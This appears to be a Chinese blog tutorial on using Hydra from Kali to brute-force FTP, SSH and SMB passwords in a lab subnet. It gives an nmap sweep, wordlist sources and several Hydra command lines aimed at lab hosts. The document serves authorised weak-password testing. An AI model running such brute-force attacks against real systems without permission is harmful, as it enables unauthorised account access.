Hydra爆破常见服务密码

    Hydra是一款专业的服务密码探测工具,支持FTP、LDAP、MYSQL、Oracle、POP3、SMB、SSH等网络服务,多用于信息安全检查工作中弱口令登陆测试。

    实验环境

    操作系统:Kali 2019.4

    目标网络:192.168.168.0/24

    爆破教程

    第一步 升级系统、软件版本(可选)

    1. # mv /etc/apt/sources.list /etc/apt/sources.list.bak    
    2. # echo "deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib" > /etc/apt/sources.list    
    3. # apt-get -y update    
    4. # apt-get -y upgrade    
    5. # apt-get -y dist-upgrade     
    6. # apt-get -y clean  

    第二步 准备密码字典(可选)

    弱密码字典合集包:https://weakpass.com

    Kali系统自带字典:/usr/share/wordlists

    自定义字典生成脚本:https://github.com/LandGrey/pydictor

    第三步 扫描指定网段主机开放的服务(可选)

    1. # nmap 192.168.168.0/24  

    第四步 爆破服务(FTP、SSH、SMB)

    简易用法:hydra -l 用户名 -P 密码字典 IP地址 服务名称

    常见用法:hydra –L 用户名字典 –P 密码字典 t 线程数 –vV 详细显示 –o 生成爆破后的密码记录 –f (爆破成功立即结束) –e n (尝试空密码) IP地址 服务名称

    1. root@kali:~# hydra -l wanghualang -P /wanghualang/hydra/password/tmp.txt 192.168.168.202 smb  
    2. root@kali:~# hydra -l wanghualang -P /wanghualang/hydra/password/tmp.txt 192.168.168.11 ssh  
    3. root@kali:~# hydra -l wanghualang -P /wanghualang/hydra/password/tmp.txt 192.168.168.1 ftp  

    Hydra爆破常见服务密码

    匿名

    发表评论

    匿名网友 填写信息